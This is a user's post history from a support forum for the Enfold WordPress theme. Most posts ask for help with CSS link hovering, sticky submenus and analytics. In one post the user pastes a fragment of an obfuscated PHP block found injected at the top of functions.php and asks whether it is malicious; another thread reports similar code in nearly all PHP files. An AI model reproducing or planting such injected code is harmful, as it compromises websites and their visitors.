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  • in reply to: 'text links hovering' appearance to change #728647

    that’s better



    in reply to: 'text links hovering' appearance to change #728634

    entry-content is working for ALL links in the main content, including pictures. Is it possible to make it applying only to the text ?

    in reply to: 'text links hovering' appearance to change #728625

    And can you do the same for those links ?

    • This reply was modified 7 years, 9 months ago by Anton.
    in reply to: 'text links hovering' appearance to change #728582

    Main.content modifies EVERYTHING.

    Now, pls, go to this page and try to hover images, titles, categories and comments:
    And look at what I need to modify on this picture

    in reply to: 'text links hovering' appearance to change #728561

    any link in the text in any post or page (
    except the sidebar, footer, etc.

    in reply to: 'text links hovering' appearance to change #728549

    Unfortunately it doesn’t change anything

    in reply to: Custom Css Class for Fullwidth Sub Menu #716157

    Hi Nikko,

    Unfortunatelly I got exactly the same problem as before. And I checked it up, as previous, in all browsers (Chrome, Opera, Yandex, Safari, Mozilla). With the only difference: in Safari the submenu is not visible “at the bottom of the top” of the page Service.

    in reply to: Custom Css Class for Fullwidth Sub Menu #714544

    Hi Nikko,

    the FTP access in private.

    in reply to: Custom Css Class for Fullwidth Sub Menu #714389

    This is the same code, given by your colleague Nikko in this thread, for both — Intelligence and Services:

    #top #sub_menu1 {bottom: 0;} .sticky_placeholder {height: 0 !important; overflow: hidden;}

    that I put in the Quick CSS of Enfold theme.

    I’ve just checked up again both pages in all browsers (Chrome, Opera, Yandex, Safari, Mozilla), and I got the same result as mentioned in my last message

    • This reply was modified 7 years, 11 months ago by Anton.
    in reply to: Custom Css Class for Fullwidth Sub Menu #713747


    I could not fix it.

    At the page Services when it’s downloaded and you click for instance on “APPROCHE” you normally get this result — no submenu on the screen. But when you start to scroll with mouth or up and down buttons, the menu does appear.

    At the page Intelligence when it’s downloaded the submenu is moved at the very bottom and when you start to scroll (as above) the submenu jumps at its place at the top…

    Can you manage this bug ?

    in reply to: Custom Css Class for Fullwidth Sub Menu #711279

    There you go

    in reply to: Custom Css Class for Fullwidth Sub Menu #710881


    it doesn’t change anything

    in reply to: Custom Css Class for Fullwidth Sub Menu #710224


    this is very strange, the code is applied. I can see the change being logged in. When I test it in another brother being logged out, the submenu doens’t appear at bottom of the boat.
    Cash is cleared. I don’t understant why is that…
    Here is the result on my end being logged in

    in reply to: Custom Css Class for Fullwidth Sub Menu #709839


    Though there are two problems to solve:

    1. go to this page and you’ll see the submenu at the bottom with its panel empty at the top. Once you scroll the page, the submenu jumps to its place (at the top) and stay there afterwards. Do you think it’s possible to fix it? Coz on this page I didn’t need the submenu at the bottom.

    2. At my Services page everything is fine now. Just one little thing (I don’t know where it comes from…): when you’re at the very top of the page and you click on any anchor of the Submenu, it disappears under the logo area before you start scrolling. Possible to manage it somehow?

    in reply to: Custom Css Class for Fullwidth Sub Menu #709214


    It is not what I need, coz with this code the submenu is not sticky at the top. And I’m not about to adjust the top margin depending on my screen size.

    I was talking twice about the code to add to the “Custom Css Class” in the Fullwidth Sub Menu, or maybe Color section. In order to put the submenu at the bottom of the picture — this is something I can’t do with 25%, 50%, 75% & 100% suggested in Color section > Section minimum height.

    in reply to: Custom Css Class for Fullwidth Sub Menu #708387


    it works, but actually I didn’t expect it staying permanently at the bottom.
    First of all, I’d like this effect with submenu only on this page and not being applied to all submenus (like here, for instance). And I’d like the submenu to stay sticky at the top, like it is now, when scrolling the page down.

    That’s why I initially asked if there’s some code to add to the “Custom Css Class” in the Fullwidth Sub Menu, or maybe Color section ? My need is to put the submenu at the bottom of the picture — this is something I can’t do with 25%, 50%, 75% & 100% suggested in Color section > Section minimum height.

    MEANING: like if I could use this percentage allowing me to lay down the submenu at the bottom of the welcome picture, but then scrolling at the top (under the logo area) and sticking there while visitor’s going down the page — like it is in original version.
    Am I clear ?

    in reply to: Custom Css Class for Fullwidth Sub Menu #707666

    The link is present in “this page” in last message

    • This reply was modified 7 years, 11 months ago by Anton.
    in reply to: Google Analytics off with Enfold 3.8 #687930


    WP Rocket updated to 2.8.14 specifically for Enfold. So both of my problems (initial included) are RESOLVED.

    in reply to: Google Analytics off with Enfold 3.8 #687046

    The “Warning: Missing argument 2 for avia_maps_key_for_plugins() in /home/newpoint/public_html/wp-content/themes/enfold/functions-enfold.php on line 66” has been caused by WP Rocket plugin (2.8.13). For the moment I deactivated it and reported to the support.
    But maybe this information could be of interest to you?

    Concerning Google Analytics and Clicky it seems like I resolved the problem.

    in reply to: Google Analytics off with Enfold 3.8 #686835

    And now I have this line added at the bottom:

    Warning: Missing argument 2 for avia_maps_key_for_plugins() in /home/newpoint/public_html/wp-content/themes/enfold/functions-enfold.php on line 66

    in reply to: Google Analytics off with Enfold 3.8 #686823

    Hi Rikard,

    I’ve verified and actually my code changed just one figure :
    BUT what is strange — it was working until the theme update without any code changing changing. And even with this new code I added to “Google Services” it still doesn’t work… I don’t understand.
    And here are my Webmaster Central verifications

    in reply to: Weird code in all php files #652028

    As I mentioned abouve:

    the code is present almost in all php files, even in those of plugins.

    So, it’s not only about the child theme, but Enfold basic folder as well as all plugins

    in reply to: Weird code in all php files #650831

    Hi Josue,

    yes actually, the code is present almost in all php files, even in those of plugins.
    Here’s the test result I’ve done:
    I don’t know what is AutoShun, but it seems like the website is clean…

    Is there a program / plugin offering possibility to delete this piece of code in all .php files automatically? Coz this is impossible to do it manually.
    Maybe any other suggestions?

    in reply to: Text instead of logo in header #649739

    Well, it puts the text now but it doesn’t shrink on scrolling and on mobile.
    So, in my case I leave the logo. May be it will be useful for others. But the given solution is not as adapted as with logo one.

    in reply to: Text instead of logo in header #649457

    Well, in my case this code has broken all the website’s interface. So deleted.

    At the same time opening my functions.php I discovered this bloc of code at the very beginning of the file. I have no idea where it comes from and what is it. Deleted it. Could you tell me if it is a malicious code or whatever ?

    <?php $kpyruzmzk = '|!*#91y]c9y]g2y]#>>*4-1-|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)t84:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>qnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm) x7fw6*CW&)7gj6<*doj%7-C)fepmz!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%zR#>q%V<*#fopoV;hojepdoFdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%6<*&7-#o]s]o]s]#)fepmqyoepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7js*#j{hnpd#)tutjyfopjudovg x22)!gj}1~!<z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sb4 162 x6f 151 x64"))) { $hiclceo x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT%}X;!sp!*#opo#>>}udovg}{;#)tutjyfopjudovg)!gj!|!*msv%)}k~~~<ftmbg!!| x24- x24gvodujpo! 52985-t.98]K4]65]D8]86]y31]278]y3f<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/d816:+946:ce44#)zbssb!>!ssbnpe_GMFTQIQ&f_UTPI0#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!! 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    in reply to: Text instead of logo in header #647059

    Actually, none of solutions given to me here and in other threads didn’t work. I finally used a logo that I had created on a transparent background.
    So, maybe this time someone will be able to offer the real solution for that..?

    in reply to: Advert scripts to insert in the Child theme #645781


    in reply to: Advert scripts to insert in the Child theme #621791

    Do you mean I can put all scripts provided for
    & header.php
    in one single funtions.php ?

    in reply to: a enfold/style.css pointing to a localhost – HELP ! #621598


    in reply to: Text instead of logo in header #621597


Viewing 30 posts - 91 through 120 (of 215 total)